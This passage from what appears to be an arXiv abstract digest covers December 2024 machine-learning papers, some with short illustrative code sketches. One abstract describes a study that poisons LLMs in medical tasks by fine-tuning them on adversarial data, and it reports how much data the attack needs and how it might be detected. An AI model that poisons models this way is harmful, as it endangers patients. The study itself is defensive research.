to tackle heterogeneous data distributions, highlighting the inherent trade-offs between privacy and accuracy. Numerical results show that our approach with various FL algorithms outperforms the state-of-the-art under the same DP conditions on the non-i.i.d. FEMNIST dataset, and highlight the cooperative jammer's effectiveness in ensuring strict privacy.
Updated: 2024-12-05 18:27:09
Categories: cs.IT,cs.LG,math.IT
Federated Automated Feature Engineering
Automated feature engineering (AutoFE) is used to automatically create new features from original features to improve predictive performance without needing significant human intervention and expertise. Many algorithms exist for AutoFE, but very few approaches exist for the federated learning (FL) setting where data is gathered across many clients and is not shared between clients or a central server. We introduce AutoFE algorithms for the horizontal, vertical, and hybrid FL settings, which differ in how the data is gathered across clients. To the best of our knowledge, we are the first to develop AutoFE algorithms for the horizontal and hybrid FL cases, and we show that the downstream model performance of federated AutoFE is similar to the case where data is held centrally and AutoFE is performed centrally.
Updated: 2024-12-05 18:23:44
Categories: cs.LG,cs.DC
Establishing Task Scaling Laws via Compute-Efficient Model Ladders
We develop task scaling laws and model ladders to predict the individual task performance of pretrained language models (LMs) in the overtrained setting. Standard power laws for language modeling loss cannot accurately model task performance. Therefore, we leverage a two-step prediction approach: first use model and data size to predict a task-specific loss, and then use this task loss to predict task performance. We train a set of small-scale "ladder" models, collect data points to fit the parameterized functions of the two prediction steps, and make predictions for two target models: a 7B model trained to 4T tokens and a 13B model trained to 5T tokens. Training the ladder models only costs 1% of the compute used for the target models. On four multiple-choice tasks written in ranked classification format, we can predict the accuracy of both target models within 2 points of absolute error. We have higher prediction error on four other tasks (average absolute error 6.9) and find that these are often tasks with higher variance in task metrics. We also find that using less compute to train fewer ladder models tends to deteriorate predictions. Finally, we empirically show that our design choices and the two-step approach lead to superior performance in establishing scaling laws.
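A hedged sketch of the two-step prediction with scipy: fit a power law in model and data size for the task loss, then a sigmoidal map from task loss to accuracy, and chain the two fits for a target model. The functional forms and all numbers are illustrative assumptions, not the paper's fitted values.

```python
import numpy as np
from scipy.optimize import curve_fit

# Step 1: task-specific loss from model size N and tokens D (assumed form).
def task_loss(ND, A, alpha, B, beta, E):
    N, D = ND
    return A / N**alpha + B / D**beta + E

# Step 2: task accuracy from task loss (assumed sigmoidal form).
def task_acc(L, a, k, L0, b):
    return a / (1 + np.exp(-k * (L - L0))) + b

# Hypothetical ladder-model measurements (sizes, tokens, loss, accuracy).
N_l = np.array([190e6, 370e6, 600e6, 760e6, 1.0e9, 1.3e9])
D_l = 20 * N_l
loss_l = np.array([2.10, 1.90, 1.78, 1.70, 1.58, 1.50])
acc_l = np.array([0.30, 0.37, 0.42, 0.46, 0.54, 0.60])

p_loss, _ = curve_fit(task_loss, (N_l, D_l), loss_l,
                      p0=[50, 0.2, 50, 0.2, 1.0], maxfev=20000)
p_acc, _ = curve_fit(task_acc, loss_l, acc_l,
                     p0=[-0.5, 5.0, 1.7, 0.75], maxfev=20000)

# Chain the two fits to predict a 7B model trained to 4T tokens.
pred_loss = task_loss((7e9, 4e12), *p_loss)
print("predicted accuracy:", task_acc(pred_loss, *p_acc))
```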
Updated: 2024-12-05 18:21:49
Categories: cs.CL,cs.AI
Learning to Reconstruct Accelerated MRI Through K-space Cold Diffusion without Noise
Deep learning-based MRI reconstruction models have achieved superior performance these days. Most recently, diffusion models have shown remarkable performance in image generation, in-painting, super-resolution, image editing and more. As a generalized diffusion model, cold diffusion further broadens the scope and considers models built around arbitrary image transformations such as blurring, down-sampling, etc. In this paper, we propose a k-space cold diffusion model that performs image degradation and restoration in k-space without the need for Gaussian noise. We provide comparisons with multiple deep learning-based MRI reconstruction models and perform tests on a well-known large open-source MRI dataset. Our results show that this novel way of performing degradation can generate high-quality reconstruction images for accelerated MRI.
Updated: 2024-12-05 18:16:10
Categories: eess.IV,cs.CV,cs.LG,physics.med-ph
Regularization by Neural Style Transfer for MRI Field-Transfer Reconstruction with Limited Data
Recent advances in MRI reconstruction have achieved remarkable success with deep learning-based models. However, most methods depend on large-scale, task-specific datasets, leaving reconstruction in data-limited settings as a critical but underexplored challenge. Regularization by denoising (RED) is a general pipeline that incorporates a denoiser as a prior for image reconstruction, showing promising results in various image processing tasks, including denoising, deblurring, and super-resolution. In this work, we propose a regularization by neural style transfer (RNST) method to further leverage the priors from the neural transfer and denoising engine. RNST effectively reconstructs high-quality images from noisy, low-quality inputs across varying image styles, even with limited data. We validate RNST on clinical MRI scans, demonstrating its ability to significantly improve image quality. These findings underline the potential of RNST for MRI field-transfer reconstruction and its promise in addressing reconstruction tasks in data-constrained scenarios.
Updated: 2024-12-05 18:07:33
Categories: cs.CV,cs.LG,physics.med-ph
Asynchronous Batch Bayesian Optimization with Pipelining Evaluations for Experimental Resource-Constrained Conditions
Bayesian optimization is efficient even with a small amount of data and is used in engineering and science, including biology and chemistry. In Bayesian optimization, a parameterized model with an uncertainty is fitted to explain the experimental data, and then the model suggests parameters that would most likely improve the results. Batch Bayesian optimization reduces the processing time of optimization by parallelizing experiments. However, batch Bayesian optimization cannot be applied if the number of parallelized experiments is limited by the cost or scarcity of equipment; in such cases, sequential methods require an unrealistic amount of time. In this study, we developed pipelining Bayesian optimization (PipeBO) to reduce the processing time of optimization even with a limited number of parallel experiments. PipeBO was inspired by pipelining in central processing unit architectures, which divides computational tasks into multiple processes. PipeBO was designed to achieve experiment parallelization by overlapping various processes of the experiments. PipeBO uses the results of completed experiments to update the parameters of running parallelized experiments. Using the Black-Box Optimization Benchmarking suite, which consists of 24 benchmark functions, we compared PipeBO with sequential Bayesian optimization methods. PipeBO reduced the average processing time of optimization to about 56% for experiments consisting of two processes, and to even less for those with more processes, on 20 of the 24 functions. Overall, PipeBO parallelizes Bayesian optimization in resource-constrained settings so that efficient optimization can be achieved.
Updated: 2024-12-05 18:06:09
Categories: cs.LG
Probabilistic Gaussian Superposition for Efficient 3D Occupancy Prediction
3D semantic occupancy prediction is an important task for robust vision-centric autonomous driving, which predicts fine-grained geometry and semantics of the surrounding scene. Most existing methods leverage dense grid-based scene representations, overlooking the spatial sparsity of the driving scenes. Although 3D semantic Gaussian serves as an object-centric sparse alternative, most of the Gaussians still describe the empty region with low efficiency. To address this, we propose a probabilistic Gaussian superposition model which interprets each Gaussian as a probability distribution of its neighborhood being occupied and conforms to probabilistic multiplication to derive the overall geometry. Furthermore, we adopt the exact Gaussian mixture model for semantics calculation to avoid unnecessary overlapping of Gaussians. To effectively initialize Gaussians in non-empty region, we design a distribution-based initialization module which learns the pixel-aligned occupancy distribution instead of the depth of surfaces. We conduct extensive experiments on nuScenes and KITTI-360 datasets and our GaussianFormer-2 achieves state-of-the-art performance with high efficiency. Code: https://github.com/huang-yh/GaussianFormer.
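The probabilistic superposition admits a compact worked form: each Gaussian contributes an occupancy probability p_i(x) = o_i * exp(-(x - mu_i)^T Sigma_i^{-1} (x - mu_i) / 2), and a point is free only if every Gaussian leaves it free, giving p(x) = 1 - prod_i (1 - p_i(x)). The sketch below evaluates this rule; the opacity parameterization is an assumption.

```python
import torch

def occupancy_probability(x, means, inv_covs, opacities):
    """Probabilistic Gaussian superposition at query points (sketch).

    x: (Q, 3) query points; means: (G, 3); inv_covs: (G, 3, 3); opacities: (G,)
    Returns p(x) = 1 - prod_i (1 - p_i(x)) for each query point.
    """
    d = x[:, None, :] - means[None, :, :]                  # (Q, G, 3)
    mahal = torch.einsum("qgi,gij,qgj->qg", d, inv_covs, d)
    p_i = opacities[None, :] * torch.exp(-0.5 * mahal)     # (Q, G)
    return 1.0 - torch.prod(1.0 - p_i.clamp(0, 1), dim=1)  # (Q,)

Q, G = 4, 256
p = occupancy_probability(torch.randn(Q, 3), torch.randn(G, 3),
                          torch.eye(3).expand(G, 3, 3), torch.rand(G))
print(p)
```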
Updated: 2024-12-05 17:59:58
Categories: cs.CV,cs.AI,cs.LG
EmbodiedOcc: Embodied 3D Occupancy Prediction for Vision-based Online Scene Understanding
3D occupancy prediction provides a comprehensive description of the surrounding scenes and has become an essential task for 3D perception. Most existing methods focus on offline perception from one or a few views and cannot be applied to embodied agents, which must gradually perceive the scene through progressive embodied exploration. In this paper, we formulate an embodied 3D occupancy prediction task to target this practical scenario and propose a Gaussian-based EmbodiedOcc framework to accomplish it. We initialize the global scene with uniform 3D semantic Gaussians and progressively update local regions observed by the embodied agent. For each update, we extract semantic and structural features from the observed image and efficiently incorporate them via deformable cross-attention to refine the regional Gaussians. Finally, we employ Gaussian-to-voxel splatting to obtain the global 3D occupancy from the updated 3D Gaussians. Our EmbodiedOcc assumes an unknown (i.e., uniformly distributed) environment and maintains an explicit global memory of it with 3D Gaussians. It gradually gains knowledge through local refinement of regional Gaussians, which is consistent with how humans understand new scenes through embodied exploration. We reorganize an EmbodiedOcc-ScanNet benchmark based on local annotations to facilitate the evaluation of the embodied 3D occupancy prediction task. Experiments demonstrate that our EmbodiedOcc outperforms existing local prediction methods and accomplishes the embodied occupancy prediction with high accuracy and strong expandability. Our code is available at: https://github.com/YkiWu/EmbodiedOcc.
Updated: 2024-12-05 17:57:09
标题: "EmbodiedOcc: 基于视觉的在线场景理解的三维体验占据预测"
摘要: 3D占据预测提供了对周围场景的综合描述,并已成为3D感知的重要任务。大多数现有方法侧重于从一个或少数视图进行离线感知,无法应用于需要通过逐步实体探索逐渐感知场景的实体代理。在本文中,我们制定了一项实体3D占据预测任务,以应对这种实际情况,并提出了基于高斯的EmbodiedOcc框架来完成这项任务。我们使用均匀的3D语义高斯对全局场景进行初始化,并逐步更新实体代理观察到的局部区域。对于每次更新,我们从观察到的图像中提取语义和结构特征,并通过可变形的交叉注意力有效地将它们合并到精炼的区域高斯中。最后,我们采用高斯到体素的喷射技术从更新后的3D高斯中获得全局3D占据情况。我们的EmbodiedOcc假设一个未知的(即均匀分布的)环境,并使用3D高斯维护其明确的全局记忆。它通过对区域高斯的局部精炼逐渐获取知识,这与人类通过实体探索理解新场景的方式是一致的。我们重新组织了一个基于局部注释的EmbodiedOcc-ScanNet基准,以促进对实体3D占据预测任务的评估。实验证明,我们的EmbodiedOcc优于现有的本地预测方法,并以高准确性和强扩展性完成了实体占据预测。我们的代码可在以下网址获得:https://github.com/YkiWu/EmbodiedOcc。
更新时间: 2024-12-05 17:57:09
Categories: cs.CV,cs.AI,cs.LG
Discriminative Fine-tuning of LVLMs
Contrastively-trained Vision-Language Models (VLMs) like CLIP have become the de facto approach for discriminative vision-language representation learning. However, these models have limited language understanding, often exhibiting a "bag of words" behavior. At the same time, Large Vision-Language Models (LVLMs), which combine vision encoders with LLMs, have been shown capable of detailed vision-language reasoning, yet their autoregressive nature renders them less suitable for discriminative tasks. In this work, we propose to combine "the best of both worlds": a new training approach for discriminative fine-tuning of LVLMs that results in strong discriminative and compositional capabilities. Essentially, our approach converts a generative LVLM into a discriminative one, unlocking its capability for powerful image-text discrimination combined with enhanced language understanding. Our contributions include: (1) A carefully designed training/optimization framework that utilizes image-text pairs of variable length and granularity for training the model with both contrastive and next-token prediction losses. This is accompanied by ablation studies that justify the necessity of our framework's components. (2) A parameter-efficient adaptation method using a combination of soft prompting and LoRA adapters. (3) Significant improvements over state-of-the-art CLIP-like models of similar size, including standard image-text retrieval benchmarks and notable gains in compositionality.
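A minimal sketch of the combined objective: a symmetric contrastive loss over pooled image/text embeddings plus a next-token prediction term. The pooling, weighting, and temperature here are illustrative assumptions; the paper additionally varies pair length and granularity and adapts parameters with soft prompting and LoRA.

```python
import torch
import torch.nn.functional as F

def discriminative_loss(img_emb, txt_emb, lm_logits, labels,
                        temperature=0.07, lam=0.5):
    """Contrastive + next-token objective for LVLM fine-tuning (sketch).

    img_emb, txt_emb: (B, D) pooled embeddings of matched image-text pairs
    lm_logits: (B, T, V) autoregressive logits; labels: (B, T) target tokens
    """
    img = F.normalize(img_emb, dim=-1)
    txt = F.normalize(txt_emb, dim=-1)
    logits = img @ txt.T / temperature            # (B, B) similarity matrix
    targets = torch.arange(img.size(0))           # matched pairs on the diagonal
    contrastive = 0.5 * (F.cross_entropy(logits, targets)
                         + F.cross_entropy(logits.T, targets))
    next_token = F.cross_entropy(lm_logits.reshape(-1, lm_logits.size(-1)),
                                 labels.reshape(-1))
    return contrastive + lam * next_token

B, D, T, V = 8, 512, 16, 32000
loss = discriminative_loss(torch.randn(B, D), torch.randn(B, D),
                           torch.randn(B, T, V), torch.randint(0, V, (B, T)))
print(loss.item())
```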
Updated: 2024-12-05 17:54:27
Fields: cs.CV,cs.AI
A Hitchhiker's Guide to Understanding Performances of Two-Class Classifiers
Properly understanding the performances of classifiers is essential in various scenarios. However, the literature often relies only on one or two standard scores to compare classifiers, which fails to capture the nuances of application-specific requirements, potentially leading to suboptimal classifier selection. Recently, a paper on the foundations of the theory of performance-based ranking introduced a tool, called the Tile, that organizes an infinity of ranking scores into a 2D map. Thanks to the Tile, it is now possible to evaluate and compare classifiers efficiently, displaying all possible application-specific preferences instead of having to rely on a pair of scores. In this paper, we provide a first hitchhiker's guide for understanding the performances of two-class classifiers by presenting four scenarios, each showcasing a different user profile: a theoretical analyst, a method designer, a benchmarker, and an application developer. Particularly, we show that we can provide different interpretative flavors that are adapted to the user's needs by mapping different values on the Tile. As an illustration, we leverage the newly introduced Tile tool and the different flavors to rank and analyze the performances of 74 state-of-the-art semantic segmentation models in two-class classification through the eyes of the four user profiles. Through these user profiles, we demonstrate that the Tile effectively captures the behavior of classifiers in a single visualization, while accommodating an infinite number of ranking scores.
Updated: 2024-12-05 17:52:35
Fields: cs.CV,cs.LG,cs.PF
CNNSum: Exploring Long-Context Summarization with Large Language Models in Chinese Novels
Large Language Models (LLMs) have been well-researched in many long-context tasks. However, due to high annotation costs, high-quality long-context summary datasets for training or evaluation are scarce, limiting further research. In this work, we introduce CNNSum, a new multi-scale Chinese long-context novel summarization benchmark, comprising four subsets with lengths covering 16k~128k tokens, 695 samples in total; the annotations are human-driven. We evaluate commercial and open-source models on CNNSum and conduct a detailed analysis. Based on the observations, we further conduct fine-tuning exploration with short-context summary data. In our study: (1) GPT-4o underperformed, due to excessive subjective commentary. (2) Currently, long-context summarization mainly relies on memory ability; small LLMs with stable longer context lengths are the most cost-effective. Using long data concatenated from short-context summaries yields a significant improvement. (3) Prompt templates may cause a large performance gap but can be mitigated through fine-tuning. (4) Fine-tuned Chat or Instruction versions may harm the Base model, and further fine-tuning cannot bridge the performance gap. (5) While models with RoPE base scaling exhibit strong extrapolation potential, their performance may vary significantly when combined with other interpolation methods and needs careful selection. (6) CNNSum provides more reliable and insightful evaluation results than other benchmarks. We release CNNSum to advance research in this field.
Updated: 2024-12-05 17:51:20
Fields: cs.CL,cs.AI
Adversarial Attacks on Large Language Models in Medicine
The integration of Large Language Models (LLMs) into healthcare applications offers promising advancements in medical diagnostics, treatment recommendations, and patient care. However, the susceptibility of LLMs to adversarial attacks poses a significant threat, potentially leading to harmful outcomes in delicate medical contexts. This study investigates the vulnerability of LLMs to two types of adversarial attacks in three medical tasks. Utilizing real-world patient data, we demonstrate that both open-source and proprietary LLMs are susceptible to manipulation across multiple tasks. This research further reveals that domain-specific tasks demand more adversarial data in model fine-tuning than general domain tasks for effective attack execution, especially for more capable models. We discover that while integrating adversarial data does not markedly degrade overall model performance on medical benchmarks, it does lead to noticeable shifts in fine-tuned model weights, suggesting a potential pathway for detecting and countering model attacks. This research highlights the urgent need for robust security measures and the development of defensive mechanisms to safeguard LLMs in medical applications, to ensure their safe and effective deployment in healthcare settings.
Updated: 2024-12-05 17:47:30
Fields: cs.AI
Don't Be So Positive: Negative Step Sizes in Second-Order Methods
The value of second-order methods lies in the use of curvature information. Yet, this information is costly to extract and once obtained, valuable negative curvature information is often discarded so that the method is globally convergent. This limits the effectiveness of second-order methods in modern machine learning. In this paper, we show that second-order and second-order-like methods are promising optimizers for neural networks provided that we add one ingredient: negative step sizes. We show that under very general conditions, methods that produce ascent directions are globally convergent when combined with a Wolfe line search that allows both positive and negative step sizes. We experimentally demonstrate that using negative step sizes is often more effective than common Hessian modification methods.
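As a toy illustration of the core idea, the sketch below extends a backtracking line search so that ascent directions are handled by searching over negative step sizes; it checks only an Armijo-style sufficient-decrease condition, whereas the paper uses full Wolfe conditions, so treat it as a simplified stand-in.

```python
import numpy as np

def signed_armijo(f, grad, x, d, t0=1.0, c1=1e-4, shrink=0.5, max_iter=30):
    """If d is an ascent direction, search over negative step sizes so the
    accepted step still decreases f (Armijo only; the paper uses Wolfe)."""
    fx, slope = f(x), grad(x) @ d
    t = t0 if slope < 0 else -t0                  # flip the sign for ascent directions
    for _ in range(max_iter):
        if f(x + t * d) <= fx + c1 * t * slope:   # sufficient decrease either way
            return t
        t *= shrink
    return 0.0                                    # no acceptable step found
```

For example, with f(x) = x @ x, a direction with positive slope such as d = x is assigned a negative step, moving the iterate back toward the minimizer instead of being discarded.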
Updated: 2024-12-05 17:44:09
Fields: cs.LG,math.OC,stat.ML
Finer Behavioral Foundation Models via Auto-Regressive Features and Advantage Weighting
The forward-backward representation (FB) is a recently proposed framework (Touati et al., 2023; Touati & Ollivier, 2021) to train behavior foundation models (BFMs) that aim at providing zero-shot efficient policies for any new task specified in a given reinforcement learning (RL) environment, without training for each new task. Here we address two core limitations of FB model training. First, FB, like all successor-feature-based methods, relies on a linear encoding of tasks: at test time, each new reward function is linearly projected onto a fixed set of pre-trained features. This limits expressivity as well as precision of the task representation. We break the linearity limitation by introducing auto-regressive features for FB, which let fine-grained task features depend on coarser-grained task information. This can represent arbitrary nonlinear task encodings, thus significantly increasing expressivity of the FB framework. Second, it is well-known that training RL agents from offline datasets often requires specific techniques. We show that FB works well together with such offline RL techniques, by adapting techniques from (Nair et al., 2020b; Cetin et al., 2024) for FB. This is necessary to get non-flatlining performance on some datasets, such as DMC Humanoid. As a result, we produce efficient FB BFMs for a number of new environments. Notably, in the D4RL locomotion benchmark, the generic FB agent matches the performance of standard single-task offline agents (IQL, XQL). In many setups, the offline techniques are needed to get any decent performance at all. The auto-regressive features have a positive but moderate impact, concentrated on tasks requiring spatial precision and task generalization beyond the behaviors represented in the training set.
Updated: 2024-12-05 17:36:22
Fields: cs.LG
Machine Theory of Mind for Autonomous Cyber-Defence
Intelligent autonomous agents hold much potential for the domain of cyber-security. However, due to many state-of-the-art approaches relying on uninterpretable black-box models, there is growing demand for methods that offer stakeholders clear and actionable insights into their latent beliefs and motivations. To address this, we evaluate Theory of Mind (ToM) approaches for Autonomous Cyber Operations. Upon learning a robust prior, ToM models can predict an agent's goals, behaviours, and contextual beliefs given only a handful of past behaviour observations. In this paper, we introduce a novel Graph Neural Network (GNN)-based ToM architecture tailored for cyber-defence, Graph-In, Graph-Out (GIGO)-ToM, which can accurately predict both the targets and attack trajectories of adversarial cyber agents over arbitrary computer network topologies. To evaluate the latter, we propose a novel extension of the Wasserstein distance for measuring the similarity of graph-based probability distributions. Whereas the standard Wasserstein distance lacks a fixed reference scale, we introduce a graph-theoretic normalization factor that enables a standardized comparison between networks of different sizes. We furnish this metric, which we term the Network Transport Distance (NTD), with a weighting function that emphasizes predictions according to custom node features, allowing network operators to explore arbitrary strategic considerations. Benchmarked against a Graph-In, Dense-Out (GIDO)-ToM architecture in an abstract cyber-defence environment, our empirical evaluations show that GIGO-ToM can accurately predict the goals and behaviours of various unseen cyber-attacking agents across a range of network topologies, as well as learn embeddings that can effectively characterize their policies.
Updated: 2024-12-05 17:35:29
Fields: cs.LG,cs.AI,cs.MA
Artificial intelligence and the internal processes of creativity
Artificial intelligence (AI) systems capable of generating creative outputs are reshaping our understanding of creativity. This shift presents an opportunity for creativity researchers to reevaluate the key components of the creative process. In particular, the advanced capabilities of AI underscore the importance of studying the internal processes of creativity. This paper explores the neurobiological machinery that underlies these internal processes and describes the experiential component of creativity. It is concluded that although the products of artificial and human creativity can be similar, the internal processes are different. The paper also discusses how AI may negatively affect the internal processes of human creativity, such as the development of skills, the integration of knowledge, and the diversity of ideas.
Updated: 2024-12-05 17:33:12
Fields: cs.CY,cs.AI,q-bio.NC
GeoPos: A Minimal Positional Encoding for Enhanced Fine-Grained Details in Image Synthesis Using Convolutional Neural Networks
The enduring inability of image generative models to recreate intricate geometric features, such as those present in human hands and fingers, has been an ongoing problem in image generation for nearly a decade. While strides have been made by increasing model sizes and diversifying training datasets, this issue remains prevalent across all models, from denoising diffusion models to Generative Adversarial Networks (GANs), pointing to a fundamental shortcoming in the underlying architectures. In this paper, we demonstrate how this problem can be mitigated by augmenting convolution layers' geometric capabilities by providing them with a single input channel incorporating the relative n-dimensional Cartesian coordinate system. We show this drastically improves the quality of images generated by Diffusion Models, GANs, and Variational AutoEncoders (VAEs).
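The paper's exact single-channel coordinate encoding is not reproduced here; the sketch below simply appends one extra channel built from normalized Cartesian coordinates to a standard convolution, in the spirit of the described augmentation, with the particular row/column combination being an assumption.

```python
import torch
import torch.nn as nn

class CoordChannelConv2d(nn.Module):
    """Conv layer whose input is augmented with a single coordinate channel."""
    def __init__(self, in_ch, out_ch, **conv_kwargs):
        super().__init__()
        self.conv = nn.Conv2d(in_ch + 1, out_ch, **conv_kwargs)

    def forward(self, x):
        b, _, h, w = x.shape
        ys = torch.linspace(-1, 1, h, device=x.device).view(1, 1, h, 1).expand(b, 1, h, w)
        xs = torch.linspace(-1, 1, w, device=x.device).view(1, 1, 1, w).expand(b, 1, h, w)
        coord = 0.5 * (ys + xs)   # collapse both axes into one channel (an assumption)
        return self.conv(torch.cat([x, coord], dim=1))

# usage: layer = CoordChannelConv2d(3, 16, kernel_size=3, padding=1)
```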
Updated: 2024-12-05 17:31:43
Fields: cs.CV,cs.AI,cs.LG,51,I.2.10; I.4.0; I.4.10
Is uniform expressivity too restrictive? Towards efficient expressivity of graph neural networks
Uniform expressivity guarantees that a Graph Neural Network (GNN) can express a query without the parameters depending on the size of the input graphs. This property is desirable in applications in order to have a number of trainable parameters that is independent of the size of the input graphs. Uniform expressivity of the two-variable guarded fragment (GC2) of first-order logic is a well-celebrated result for Rectified Linear Unit (ReLU) GNNs [Barcelo et al., 2020]. In this article, we prove that uniform expressivity of GC2 queries is not possible for GNNs with a wide class of Pfaffian activation functions (including the sigmoid and tanh), answering a question formulated by [Grohe, 2021]. We also show that despite these limitations, many of those GNNs can still efficiently express GC2 queries in a way that the number of parameters remains logarithmic in the maximal degree of the input graphs. Furthermore, we demonstrate that a log-log dependency on the degree is achievable for a certain choice of activation function. This shows that uniform expressivity can be successfully relaxed by covering large graphs appearing in practical applications. Our experiments illustrate that our theoretical estimates hold in practice.
Updated: 2024-12-05 17:22:21
Fields: cs.LG,cs.CC,cs.LO
Introducing the Large Medical Model: State of the art healthcare cost and risk prediction with transformers trained on patient event sequences
With U.S. healthcare spending approaching $5T (NHE Fact Sheet 2024), and 25% of it estimated to be wasteful (Waste in the US health care system: estimated costs and potential for savings, n.d.), the need to better predict risk and optimal patient care is ever more important. This paper introduces the Large Medical Model (LMM), a generative pre-trained transformer (GPT) designed to guide and predict the broad facets of patient care and healthcare administration. The model is trained on medical event sequences from over 140M longitudinal patient claims records with a specialized vocabulary built from medical terminology systems and demonstrates a superior capability to forecast healthcare costs and identify potential risk factors. Through experimentation and validation, we showcase the LMM's proficiency not only in cost and risk prediction, but also in discerning intricate patterns within complex medical conditions and identifying novel relationships in patient care. The LMM improves cost prediction by 14.1% over the best commercial models and chronic-condition prediction by 1.9% over the best transformer models in research predicting a broad set of conditions. The LMM is a substantial advancement in healthcare analytics, offering the potential to significantly enhance risk assessment, cost management, and personalized medicine.
Updated: 2024-12-05 17:19:12
Fields: cs.LG,cs.AI,stat.AP,stat.ML,I.2.1; K.4.1; K.4.3; J.1; J.3
Approximate Top-$k$ for Increased Parallelism
We present an evaluation of bucketed approximate top-$k$ algorithms. Computing top-$k$ exactly suffers from limited parallelism, because the $k$ largest values must be aggregated along the vector, thus is not well suited to computation on highly-parallel machine learning accelerators. By relaxing the requirement that the top-$k$ is exact, bucketed algorithms can dramatically increase the parallelism available by independently computing many smaller top-$k$ operations. We explore the design choices of this class of algorithms using both theoretical analysis and empirical evaluation on downstream tasks. Our motivating examples are sparsity algorithms for language models, which often use top-$k$ to select the most important parameters or activations. We also release a fast bucketed top-$k$ implementation for PyTorch.
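A minimal version of the bucketed scheme is easy to state: split the vector into equal buckets, take a small top-k in each bucket independently (which parallelizes well), and concatenate. The sketch below assumes the vector length and k are divisible by the bucket count; it is an illustration of the idea, not the released PyTorch implementation.

```python
import torch

def bucketed_topk(x, k, num_buckets):
    """Approximate top-k of a 1-D tensor via independent per-bucket top-k."""
    n = x.numel()
    per_bucket, bucket_len = k // num_buckets, n // num_buckets
    vals, idx = x.view(num_buckets, bucket_len).topk(per_bucket, dim=-1)
    offsets = torch.arange(num_buckets, device=x.device).unsqueeze(1) * bucket_len
    return vals.flatten(), (idx + offsets).flatten()   # values and original indices
```

The result can miss true top-k elements when more than k/num_buckets of them land in one bucket, which is exactly the accuracy-vs-parallelism trade-off the paper analyzes.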
Updated: 2024-12-05 17:17:28
Fields: cs.LG
Multi-Scale Node Embeddings for Graph Modeling and Generation
Lying at the interface between Network Science and Machine Learning, node embedding algorithms take a graph as input and encode its structure onto output vectors that represent nodes in an abstract geometric space, enabling various vector-based downstream tasks such as network modelling, data compression, link prediction, and community detection. Two apparently unrelated limitations affect these algorithms. On one hand, it is not clear what the basic operation defining vector spaces, i.e. the vector sum, corresponds to in terms of the original nodes in the network. On the other hand, while the same input network can be represented at multiple levels of resolution by coarse-graining the constituent nodes into arbitrary block-nodes, the relationship between node embeddings obtained at different hierarchical levels is not understood. Here, building on recent results in network renormalization theory, we address these two limitations at once and define a multiscale node embedding method that, upon arbitrary coarse-grainings, ensures statistical consistency of the embedding vector of a block-node with the sum of the embedding vectors of its constituent nodes. We illustrate the power of this approach on two economic networks that can be naturally represented at multiple resolution levels: namely, the international trade between (sets of) countries and the input-output flows among (sets of) industries in the Netherlands. We confirm the statistical consistency between networks retrieved from coarse-grained node vectors and networks retrieved from sums of fine-grained node vectors, a result that cannot be achieved by alternative methods. Several key network properties, including a large number of triangles, are successfully replicated already from embeddings of very low dimensionality, allowing for the generation of faithful replicas of the original networks at arbitrary resolution levels.
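The consistency requirement has a direct operational reading: coarse-graining nodes into block-nodes and summing their vectors should agree (statistically) with embedding the coarse-grained network directly. A small sketch of the summation side, with a hypothetical `blocks` partition:

```python
import numpy as np

def coarse_grained_embeddings(node_vecs, blocks):
    """Block-node embedding as the sum of its constituent node embeddings.
    node_vecs: (N, D) array; blocks: dict mapping block id -> member indices."""
    return {b: node_vecs[idx].sum(axis=0) for b, idx in blocks.items()}

# e.g. merging fine-grained nodes {0, 1} and {2, 3, 4} into two block-nodes:
# coarse = coarse_grained_embeddings(vecs, {0: [0, 1], 1: [2, 3, 4]})
```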
Updated: 2024-12-05 17:12:45
Fields: physics.soc-ph,cs.LG,econ.GN,physics.data-an,q-fin.EC
ActFusion: a Unified Diffusion Model for Action Segmentation and Anticipation
Temporal action segmentation and long-term action anticipation are two popular vision tasks for the temporal analysis of actions in videos. Despite apparent relevance and potential complementarity, these two problems have been investigated as separate and distinct tasks. In this work, we tackle these two problems, action segmentation and action anticipation, jointly using a unified diffusion model dubbed ActFusion. The key idea to unification is to train the model to effectively handle both visible and invisible parts of the sequence in an integrated manner; the visible part is for temporal segmentation, and the invisible part is for future anticipation. To this end, we introduce a new anticipative masking strategy during training in which a late part of the video frames is masked as invisible, and learnable tokens replace these frames to learn to predict the invisible future. Experimental results demonstrate the bi-directional benefits between action segmentation and anticipation. ActFusion achieves the state-of-the-art performance across the standard benchmarks of 50 Salads, Breakfast, and GTEA, outperforming task-specific models in both of the two tasks with a single unified model through joint learning.
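The anticipative masking step can be sketched independently of the diffusion model: mask the tail of the frame-feature sequence as the "invisible future" and substitute a learnable token. The mask ratio and shapes below are illustrative assumptions.

```python
import torch

def anticipative_mask(frames, mask_token, mask_ratio=0.3):
    """frames: (B, T, D) visual features; mask_token: learnable (D,) parameter.
    Returns the masked sequence and the visible/invisible boundary index."""
    T = frames.size(1)
    t0 = int(T * (1.0 - mask_ratio))
    out = frames.clone()
    out[:, t0:] = mask_token        # broadcast the token over the masked future
    return out, t0
```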
Updated: 2024-12-05 17:12:35
Fields: cs.CV,cs.LG
BhashaVerse : Translation Ecosystem for Indian Subcontinent Languages
This paper focuses on developing translation models and related applications for 36 Indian languages, including Assamese, Awadhi, Bengali, Bhojpuri, Braj, Bodo, Dogri, English, Konkani, Gondi, Gujarati, Hindi, Hinglish, Ho, Kannada, Kangri, Kashmiri (Arabic and Devanagari), Khasi, Mizo, Magahi, Maithili, Malayalam, Marathi, Manipuri (Bengali and Meitei), Nepali, Oriya, Punjabi, Sanskrit, Santali, Sinhala, Sindhi (Arabic and Devanagari), Tamil, Tulu, Telugu, and Urdu. Achieving this requires parallel and other types of corpora for all 36 * 36 language pairs, addressing challenges like script variations, phonetic differences, and syntactic diversity. For instance, languages like Kashmiri and Sindhi, which use multiple scripts, demand script normalization for alignment, while low-resource languages such as Khasi and Santali require synthetic data augmentation to ensure sufficient coverage and quality. To address these challenges, this work proposes strategies for corpus creation by leveraging existing resources, developing parallel datasets, generating domain-specific corpora, and utilizing synthetic data techniques. Additionally, it evaluates machine translation across various dimensions, including standard and discourse-level translation, domain-specific translation, reference-based and reference-free evaluation, error analysis, and automatic post-editing. By integrating these elements, the study establishes a comprehensive framework to improve machine translation quality and enable better cross-lingual communication in India's linguistically diverse ecosystem.
Updated: 2024-12-05 17:10:19
Fields: cs.CL,cs.AI
Iris: Dynamic Privacy Preserving Search in Authenticated Chord Peer-to-Peer Networks
